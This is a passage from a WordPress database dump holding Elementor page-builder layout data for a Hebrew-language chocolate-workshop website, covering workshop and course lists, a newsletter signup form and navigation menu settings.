\\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":28},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"bold\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(225,58,'_elementor_version','0.4'),(228,46,'_elementor_edit_mode','builder'),(229,59,'_elementor_template_type','section'),(230,59,'_elementor_edit_mode','builder'),(231,60,'_elementor_template_type','page'),(232,60,'_elementor_edit_mode','builder'),(233,59,'_wp_page_template','default'),(234,59,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false}]'),(235,61,'_elementor_template_type','page'),(236,61,'_elementor_edit_mode','builder'),(237,61,'_wp_page_template','default'),(238,61,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false}]'),(239,59,'_elementor_version','0.4'),(240,62,'_elementor_template_type','section'),(241,62,'_elementor_edit_mode','builder'),(242,63,'_elementor_template_type','page'),(243,63,'_elementor_edit_mode','builder'),(244,62,'_wp_page_template','default'),(245,62,'_elementor_data','[{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false}]'),(246,64,'_elementor_template_type','page'),(247,64,'_elementor_edit_mode','builder'),(248,64,'_wp_page_template','default'),(249,64,'_elementor_data','[{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false}]'),(250,62,'_elementor_version','0.4'),(251,65,'_elementor_template_type','section'),(252,65,'_elementor_edit_mode','builder'),(253,66,'_elementor_template_type','page'),(254,66,'_elementor_edit_mode','builder'),(255,65,'_wp_page_template','default'),(256,65,'_elementor_data','[{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 